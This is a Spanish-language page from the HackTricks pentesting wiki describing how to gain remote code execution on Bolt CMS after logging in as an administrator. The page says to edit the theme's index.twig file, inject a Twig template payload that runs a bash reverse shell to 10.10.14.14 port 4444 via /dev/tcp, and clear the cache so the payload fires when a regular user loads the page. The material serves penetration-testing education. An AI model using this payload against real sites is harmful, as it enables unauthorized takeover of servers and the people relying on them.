Español - Ht

English - HackTricks Afrikaans - Ht Chinese - Ht Español - Ht Français - Ht German - Ht Greek - Ht Hindi - Ht Italian - Ht Japanese - Ht Korean - Ht Polish - Ht Português - Ht Serbian - Ht Swahili - Ht Turkish - Ht Ukrainian - Ht

HackTricks Training Twitter Linkedin Sponsor

HackTricks Training Twitter Linkedin Sponsor

Español - Ht

English - HackTricks Afrikaans - Ht Chinese - Ht Español - Ht Français - Ht German - Ht Greek - Ht Hindi - Ht Italian - Ht Japanese - Ht Korean - Ht Polish - Ht Português - Ht Serbian - Ht Swahili - Ht Turkish - Ht Ukrainian - Ht

👾Welcome!
🤩Generic Methodologies & Resources
🧙‍♂️Generic Hacking
🐧Linux Hardening
🍏MacOS Hardening
🪟Windows Hardening
📱Mobile Pentesting
👽Network Services Pentesting
🕸️Pentesting Web
⛈️Cloud Security
😎Hardware/Physical Access
🎯Binary Exploitation
🔩Reversing
🔮Crypto & Stego
✍️TODO

Powered by GitBook

On this page

Was this helpful?

👽Network Services Pentesting

80,443 - Pentesting Web Methodology

Bolt CMS

PreviousArtifactory Hacking guide NextBuckets

Last updated 5 months ago

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

RCE

Después de iniciar sesión como administrador (ve a /bot para acceder al aviso de inicio de sesión), puedes obtener RCE en Bolt CMS:

Selecciona Configuration -> View Configuration -> Main Configuration o ve a la ruta de URL /bolt/file-edit/config?file=/bolt/config.yaml
Verifica el valor del tema

Selecciona File management -> View & edit templates
Selecciona la base del tema encontrada en el paso anterior (base-2021 en este caso) y selecciona index.twig
En mi caso, esto está en la ruta de URL /bolt/file-edit/themes?file=/base-2021/index.twig
Establece tu payload en este archivo a través de template injection (Twig), como: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
Y guarda los cambios

Limpia la caché en Maintenance -> Clear the cache
Accede nuevamente a la página como un usuario regular, y el payload debería ejecutarse

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)